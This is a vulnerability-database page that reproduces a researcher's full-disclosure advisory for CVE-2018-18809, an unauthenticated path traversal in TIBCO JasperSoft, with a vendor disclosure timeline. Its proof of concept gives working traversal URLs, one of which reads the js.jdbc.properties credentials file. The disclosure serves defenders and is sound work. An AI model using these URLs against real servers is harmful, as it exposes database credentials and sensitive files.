Tibco JasperSoft Path Traversal

🗓️ 09 Sep 2019 00:00:00Reported by Elar LangType

packetstorm🔗 packetstormsecurity.com👁 344 Views

CVE-2018-18809 Path Traversal in Tibco JasperSoft, remote unauthenticated access to sensitive file

Reporter	Title	Published	Views	Family All 20
0day.today	Tibco JasperSoft Path Traversal Vulnerability	10 Sep 201900:00	–	zdt
IBM Security Bulletins	Security Bulletin: TIBCO JasperReports Vulnerabilities Affect IBM Sterling B2B Integrator (CVE-2020-9410, CVE-2018-18809)	6 Oct 202114:49	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple JasperReports Vulnerabilities Affect IBM Control Center (CVE-2020-9410, CVE-2018-18809)	16 Jun 202119:25	–	ibm
ATTACKERKB	TIBCO JasperReports Library Directory Traversal Vulnerability	7 Mar 201900:00	–	attackerkb
BDU FSTEC	The vulnerability of the server-side application library for creating reports from TIBCO JasperReports Library, JasperReports Library for ActiveMatrix BPM, JasperReports Server, JasperReports Server for AWS Marketplace, and JasperReports Server for ActiveMatrix BPM arises from an incorrect limitation on the path to the restricted directory. This allows attackers to disclose sensitive information that should be protected.	1 Mar 202300:00	–	bdu_fstec
Circl	CVE-2018-18809	8 Mar 201900:21	–	circl
CISA KEV Catalog	TIBCO JasperReports Library Directory Traversal Vulnerability	29 Dec 202200:00	–	cisa_kev
CNVD	Multiple TIBCO Software Products Path Traversal Vulnerabilities	10 Sep 201900:00	–	cnvd
CVE	CVE-2018-18809	7 Mar 201922:00	–	cve
Cvelist	CVE-2018-18809 TIBCO JasperReports Library Directory Traversal Vulnerability	7 Mar 201922:00	–	cvelist

`Title: CVE-2018-18809 Path traversal in Tibco JasperSoft  
Credit: Elar Lang / https://security.elarlang.eu  
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)  
Vulnerability: Path traversal  
CVE: CVE-2018-18809  
  
# Path traversal  
Vulnerability is in reportresource/reportresource/ service and in resource  
parameter. There is "defence" - value for resource param must start with  
net/sf/jasperreports/.  
  
Available for remote not authenticated users.  
  
## Proof-of-Concept  
Reading file listing:  
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../  
  
Reading file content (js.jdbc.properties as an example):  
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties  
  
# List of Systems Affected, Related fixes and releases:  
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -  
2018-18809"  
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809  
  
  
# Vulnerability Disclosure Timeline  
  
2018-10-15 | me > Tibco | Notification to [email protected]  
2018-10-15 | Tibco > me | Thanks for PoC  
  
2018-10-29 | me > Tibco | How is going? No fixes even for their own site.  
2018-10-15 | Tibco > me | Explanation of policy that they threat everyone  
equally and as no fix available for their customer, they can not fix their  
own site also.  
  
2019-01-11 | Tibco > me | Issue is still under investigation. Issue  
discovery credits and publishing details coordination for future.  
2019-01-11 | me > Tibco | Response, agreement with credits.  
  
2019-03-06 | Tibco > me | "We published security advisories"  
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO  
JasperReports Library - 2018-18809"  
  
2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own  
demo site is still vulnerable.  
..  
2019-04-26 | Tibco > me | Demo site fixed/updated now.  
  
2019-09-07 | me | Full Disclosure on https://security.elarlang.eu  
  
# More detailed description is available in blog:  
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html  
  
--  
Elar Lang  
Blog @ https://security.elarlang.eu  
Pentester, lecturer @ http://www.clarifiedsecurity.com  
  
  
`

09 Sep 2019 00:00Current

6.8Medium risk

Vulners AI Score6.8

EPSS0.79836